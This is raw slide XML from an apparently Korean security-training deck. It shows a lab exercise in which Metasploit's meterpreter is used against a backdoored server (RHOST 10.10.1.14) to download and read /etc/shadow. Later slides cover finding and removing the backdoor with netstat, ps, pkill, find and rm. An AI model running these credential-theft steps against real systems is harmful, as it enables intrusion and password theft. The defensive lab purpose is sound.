              <a:t>에 백도어가 실행 중인 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 입력 및 공격 실행</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RHOST 10.10.1.14 </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exploit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명령어 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; ls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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>download /etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow</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11334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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter &gt; exit</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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># cat shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 179">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C3BCA3-9BB8-4337-B5CF-B403A753F283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" t="49926" r="168"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="1173480"/>
            <a:ext cx="4894580" cy="1479253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891A50A9-8CB4-4BBE-980C-FBD922DBB5FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1" t="57835" r="-34"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485141" y="3261360"/>
            <a:ext cx="4981586" cy="1253066"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 183">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F17DDB-A907-4B63-9349-AC559CF79CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="84372" r="-587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514235" y="5224401"/>
            <a:ext cx="4981586" cy="460119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6063D546-AB04-4D65-9C36-C2817EA9E7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-1" t="75071" r="111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314441" y="1090633"/>
            <a:ext cx="4947920" cy="735477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34395978-B9BB-4247-AB05-15CF4EFB3C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="66256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291835" y="2324100"/>
            <a:ext cx="4959223" cy="995637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7051361A-A816-4D54-9650-AAEAA2A01279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="3596640"/>
            <a:ext cx="5616792" cy="289235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 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># aehcek</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/root/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99691960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72AF5CF2-5352-4A46-B0EB-8A66B562E7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시스템에 해커가 침입하여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내부에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심어 놨다는 정보가 입수되었다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외부 공격자 서버와 접속 중인 것으로 보이는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찾아 삭제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열린 포트 목록 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: netstat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tnap</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확인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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> -ef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중지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pkill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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239436987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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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패킷 캡처 및 분석</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사용자 서버와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 간에 많은 통신이 수행되고 있음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 통신하는 포트 및 프로세스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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728B4C54-43A6-446E-9DF2-58C0AE154DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477520" y="879686"/>
            <a:ext cx="4877816" cy="2735199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 191">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B247FD-E1F6-4EF3-9F6D-FC3F3EC6D8CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6493" r="2233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="4282440"/>
            <a:ext cx="4877816" cy="609684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 193">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EBBEC8-DFA0-4959-BBFF-C5F1A8B5872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="61214" r="350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="5158135"/>
            <a:ext cx="4989196" cy="1064852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9969BFB-5647-4C23-96C6-0F1477534FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="37140" r="480"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="486293"/>
            <a:ext cx="4982591" cy="1747985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B282583C-EB70-428E-A36A-5E719528FD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="36093"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="2995262"/>
            <a:ext cx="4877816" cy="1747985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0A445C-03BC-4C6F-9C9B-0EB26966B6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2078761004"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6340729" y="4803146"/>
          <a:ext cx="4932807" cy="1467993"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="299628295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22453205"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="99415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찾는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>find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명령도 활용 가능</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find / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.elf</a:t>
                      </a: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91311"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80897" name="_x1658364984">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1621EE3-D92B-43A5-A1BC-CB3D95DE5E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2352" y="5648745"/>
            <a:ext cx="3733800" cy="479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5050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err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로세스 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –ef | grep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해당 프로세스 강제 종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로그램 파일 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># rm /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBC3C99-54C1-4543-AEE4-CC09504CFFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="864446"/>
            <a:ext cx="5019040" cy="542544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 201">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1EF64E-0818-4E2B-B2FB-91D8CF887FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="2324" r="-82" b="82276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="1988820"/>
            <a:ext cx="3096260" cy="179535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69C25BA-3706-4FD8-8E42-8515EC5CD85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
